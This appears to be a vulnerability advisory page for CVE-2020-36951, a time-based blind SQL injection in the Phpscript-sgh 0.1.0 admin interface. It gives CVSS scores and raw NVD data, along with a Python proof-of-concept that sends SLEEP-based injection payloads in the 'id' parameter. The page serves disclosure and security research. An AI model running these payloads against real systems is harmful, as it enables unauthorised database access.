Security Vulnerability Report
CVE-2020-36951 CVSS 8.2 HIGH

CVE-2020-36951

Published: 2026-01-27 16:16:13
Last Modified: 2026-04-15 00:35:42

Description

Phpscript-sgh 0.1.0 contains a time-based blind SQL injection vulnerability in the admin interface that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit this vulnerability by crafting malicious payloads that trigger time delays, enabling them to extract sensitive database information through conditional sleep techniques.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Phpscript-sgh 0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time
import requests

# CVE-2020-36951 Time-based Blind SQL Injection PoC
# Target: Phpscript-sgh 0.1.0 admin interface

target_url = "http://target.com/admin/index.php"


def time_based_sqli_test(payload):
    """
    Test for time-based blind SQL injection
    Returns True if vulnerability exists (response delayed)
    """
    start_time = time.time()

    # Simulate request with SQL injection payload in 'id' parameter
    # Original request: id=1
    # Injected request: id=1 AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)
    params = {
        'id': payload
    }

    try:
        response = requests.get(target_url, params=params, timeout=10)
        elapsed = time.time() - start_time

        # If response takes > 5 seconds, injection successful
        if elapsed > 5:
            return True
    except requests.exceptions.RequestException:
        pass

    return False


# Example payloads
payloads = [
    "1 AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--",
    "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--",
    "1' OR (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
]

# Test vulnerability
for payload in payloads:
    if time_based_sqli_test(payload):
        print(f"[+] Vulnerable! Payload: {payload}")
        break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36951", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpscript-sgh 0.1.0 contains a time-based blind SQL injection vulnerability in the admin interface that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit this vulnerability by crafting malicious payloads that trigger time delays, enabling them to extract sensitive database information through conditional sleep techniques."}, {"lang": "es", "value": "Phpscript-sgh 0.1.0 contiene una vulnerabilidad de inyección SQL ciega basada en tiempo en la interfaz de administración que permite a los atacantes manipular consultas de base de datos a través del parámetro 'id'. Los atacantes pueden explotar esta vulnerabilidad creando cargas útiles maliciosas que desencadenan retrasos de tiempo, permitiéndoles extraer información sensible de la base de datos a través de técnicas de suspensión condicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/geraked/phpscript-sgh", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49192", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpscript-sgh-time-based-blind-sql-injection", "source": "[email protected]"}]}}